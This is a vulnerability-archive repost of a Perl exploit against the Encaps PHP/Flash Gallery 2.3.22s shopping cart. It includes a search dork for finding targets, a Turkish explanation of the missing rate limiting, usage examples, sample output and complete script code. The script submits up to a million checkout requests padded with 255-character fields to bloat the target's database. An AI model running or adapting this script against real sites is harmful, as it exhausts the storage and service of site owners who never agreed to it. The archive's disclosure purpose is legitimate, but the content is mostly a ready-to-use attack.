Encaps PHP/Flash Gallery 2.3.22s Database Puffing Up Exploit

2015-05-12T00:00:00
ID SECURITYVULNS:DOC:32085
Type securityvulns
Reporter Securityvulns
Modified 2015-05-12T00:00:00

Description

Hi guys,

ref: http://www.milw00rm.com/exploits/5179

!/usr/bin/perl -w

Title : Encaps PHP/Flash Gallery 2.3.22s Database Puffing Up Exploit

Vendor : http://www.encaps.net

Download : http://sourceforge.net/projects/encapsnet/files/

Author : ZoRLu / zorlu@milw00rm.com

Website : milw00rm.com / milw00rm.net / milw00rm.org

Twitter : https://twitter.com/milw00rm or @milw00rm

Test : Windows7 Ultimate

Date : 19/12/2014

Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others

BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )

Dork : intext:"encaps php gallery"

Note : must be shopcart is enable

Desciption : its be Turkish because i dont know very well speak english

Script uzerinden begendiginiz herhangi bir urunu siparis ederken (mesela: http://server/path/shopcart.php?action=add&item_id=1)

sizlerden isim, e-posta ve adres bilgileri isteniyor. Bu bilgilerin kontrolu ise (http://server/path/admin/shopcart.php)

linki uzerinden yapilmakta yani girdiginiz her turlu veri burada kayit altina aliniyor haliyle veritabanina yaziliyor ve bu islem

yapilirken kod filtreleme disinda hic bir veri giris kontrolu yapilmiyor. Evet item_name, address_name vb. parametreler icin karakter

sinirlamasi yapilmis fakat bu verilerin ardarda gonderilmesini engelleyen herhangi bir uygulama soz konusu degil, istedigimiz kadar

veriyi araliksiz gonderip veritabanina buyuk bir yukleme yapabiliyoruz haliyle veritabanini sisiriyoruz yani database puffing up

perl encaps.pl

Usage: perl encaps.pl http://server /script_path/

Exam1: perl encaps.pl http://server /test/

Exam2: perl encaps.pl http://server /

perl encaps.pl http://server /test/

[+] Sending: 1

[+] Sending: 2

[+] Sending: 3

[+] Sending: 4

[+] Sending: 5

[+] Sending: 6

[+] Sending: 7

[+] Sending: 8

[+] Sending: 9

[+] Sending: 10

[+] Sending: 11

Terminating on signal SIGINT(2) (i stopped exploit for stop ctrl+c please)

You can look here for your send: http://server/test/admin/shopcart.php

use HTTP::Request::Common qw( POST ); use LWP::UserAgent; use IO::Socket; use strict; use warnings;

sub hlp() {

system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print "\nUsage: perl $0 http://server /script_path/ \n"; print "Exam1: perl $0 http://server /test/ \n"; print "Exam2: perl $0 http://server / \n";

}

if(@ARGV != 2) {

hlp(); exit();

}

my $ua = LWP::UserAgent->new; my $url = $ARGV[0]; my $path = $ARGV[1]; my $puffing = $url.$path."shopcart.php?action=add"; my $address = "A" x 255; #its limit =\ its for my $itemname = "A" x 255; #its limit =/ more loading at database

my $req = POST $puffing, [ payer_business_name => 'TestName', #for loading its a little payer_email => 'salla@google.com', #for loading its a little address_name => $address, #its 255 character for more loading item_number1 => '1', #its item number not null item_name1 => $itemname, #its 255 character for more loading amount1 => '', #its maybe null because limit a little quantity1 => '', #its maybe null because limit a little mc_gross_1 => '', #its maybe null because limit a little num_cart_items => '1', #its not null action => 'checkout_submit', #its action and not null ];

my $resp = $ua->request($req); unless ($resp->is_success) {

print "[-] HTTP POST error code: ", $resp->code, "\n";
    print "[-] HTTP POST error message: ", $resp->message, "\n";

     }

else {

my $resp = $ua->request($req);
    my $message = $resp->decoded_content;
my $regex = "Thank you for your interest, we will contact you soon.";
unless ($message =~ /$regex/) {
print "[-] Exploit Failed\n";
     }

     else {

     for (my $i=1; $i<=1000000; $i++) {

     my $resp = $ua->request($req);
     print "[+] Sending: $i\n";

     }


     }

}